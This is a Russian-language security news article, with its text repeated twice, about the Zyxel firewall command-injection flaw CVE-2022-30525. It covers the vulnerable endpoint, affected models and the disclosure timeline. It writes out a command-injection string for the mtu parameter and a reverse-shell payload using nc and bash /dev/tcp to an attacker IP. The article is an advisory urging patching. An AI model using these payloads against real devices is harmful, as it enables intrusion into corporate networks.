Исследователи Rapid7 обнаружили критическую уязвимость CVE-2022-30525 (с оценкой CVSS v3: 9,8) в брандмауэре Zyxel. Критические уязвимости брандмауэра могут позволить злоумышленникам получить полный доступ к устройствам и внутренним корпоративным сетям, которые они как бы защищают.
Уязвимость представляет собой возможность ввода удаленной команды без проверки подлинности через интерфейс HTTP в межсетевых экранах Zyxel, поддерживающих Zero Touch Provisioning (ZTP), затрагивая версии встроенного ПО от ZLD5.00 до ZLD5.21.
Выявленная уязвимость эксплуатируется через URI /ztp/cgi-bin/handler. Команды при этом могут выполняться от имени пользователя «nobody». Уязвимая функциональность вызывается командой setWanPortSt. Злоумышленник может ввести произвольные команды в параметр mtu или data.
Например, атакующий может передать в поле mtu строку "; ping 192.168.1.210;" которая приведёт к выполнению в системе команды "ping 192.168.1.210". Для получения доступа к командной оболочке можно запустить на своей системе "nc -lvnp 1270", после чего инициировать обратное соединение (reverse shell) отправив на устройство запрос с параметром '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
Типичными последствиями такой атаки будут модификация файлов и выполнение команд ОС, что позволит злоумышленникам получить первоначальный доступ к сети и распространиться по сети. Эксплуатация CVE-2022-30525, прежде всего, позволит злоумышленнику закрепиться во внутренней сети жертвы.
Среди уязвимых моделей: USG FLEX 50, 50W, 100W, 200, 500, 700 с прошивкой 5.21 и ниже; USG20-VPN и USG20W-VPN с прошивкой 5.21 и ниже; ATP 100, 200, 500, 700, 800 с прошивкой 5.21 и ниже, которые в основном используются в небольших офисах и штаб-квартирах для организации VPN, проверки SSL, защиты от вторжений, электронной почты и веб-фильтрации.
Об ошибке ресерчеры сообщили разработчику 13 апреля 2022 года. Изучив представленные исследователи материалы Zyxel подтвердили серьезность уязвимости и пообещали исправить в июне 2022 года, но выпустили исправления в виде автоматического обновления уже 28 апреля 2022 года, не предоставив при этом каких-либо технических подробностей или рекомендаций по смягчению последствий.
Позже, конечно же разработчики исправились и разместили соответствующие указания клиентам.
На днях Rapid 7 опубликовали отчет с раскрытием технических деталей и соответствующим модулем Metasploit, который используя CVE-2022-30525, вводит команды в поле MTU. Кроме того, открывший багу исследователь Джейк Бейнс продемонстрировал видео с ее эксплуатацией.
Поскольку технические детали и Metasploit доступны и уже изучаются хакерами всех мастей, администраторам необходимо обновить как можно скорее свои устройства, начнется активное использование уязвимости. А это произойдёт однозначно, поскольку на момент всей этой истории в сети обнаруживается до 17 тысяч доступных уязвимых систем.
Выводы делайте сами.
Уязвимость представляет собой возможность ввода удаленной команды без проверки подлинности через интерфейс HTTP в межсетевых экранах Zyxel, поддерживающих Zero Touch Provisioning (ZTP), затрагивая версии встроенного ПО от ZLD5.00 до ZLD5.21.
Выявленная уязвимость эксплуатируется через URI /ztp/cgi-bin/handler. Команды при этом могут выполняться от имени пользователя «nobody». Уязвимая функциональность вызывается командой setWanPortSt. Злоумышленник может ввести произвольные команды в параметр mtu или data.
Например, атакующий может передать в поле mtu строку "; ping 192.168.1.210;" которая приведёт к выполнению в системе команды "ping 192.168.1.210". Для получения доступа к командной оболочке можно запустить на своей системе "nc -lvnp 1270", после чего инициировать обратное соединение (reverse shell) отправив на устройство запрос с параметром '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
Типичными последствиями такой атаки будут модификация файлов и выполнение команд ОС, что позволит злоумышленникам получить первоначальный доступ к сети и распространиться по сети. Эксплуатация CVE-2022-30525, прежде всего, позволит злоумышленнику закрепиться во внутренней сети жертвы.
Среди уязвимых моделей: USG FLEX 50, 50W, 100W, 200, 500, 700 с прошивкой 5.21 и ниже; USG20-VPN и USG20W-VPN с прошивкой 5.21 и ниже; ATP 100, 200, 500, 700, 800 с прошивкой 5.21 и ниже, которые в основном используются в небольших офисах и штаб-квартирах для организации VPN, проверки SSL, защиты от вторжений, электронной почты и веб-фильтрации.
Об ошибке ресерчеры сообщили разработчику 13 апреля 2022 года. Изучив представленные исследователи материалы Zyxel подтвердили серьезность уязвимости и пообещали исправить в июне 2022 года, но выпустили исправления в виде автоматического обновления уже 28 апреля 2022 года, не предоставив при этом каких-либо технических подробностей или рекомендаций по смягчению последствий.
Позже, конечно же разработчики исправились и разместили соответствующие указания клиентам.
На днях Rapid 7 опубликовали отчет с раскрытием технических деталей и соответствующим модулем Metasploit, который используя CVE-2022-30525, вводит команды в поле MTU. Кроме того, открывший багу исследователь Джейк Бейнс продемонстрировал видео с ее эксплуатацией.
Поскольку технические детали и Metasploit доступны и уже изучаются хакерами всех мастей, администраторам необходимо обновить как можно скорее свои устройства, начнется активное использование уязвимости. А это произойдёт однозначно, поскольку на момент всей этой истории в сети обнаруживается до 17 тысяч доступных уязвимых систем.
Выводы делайте сами.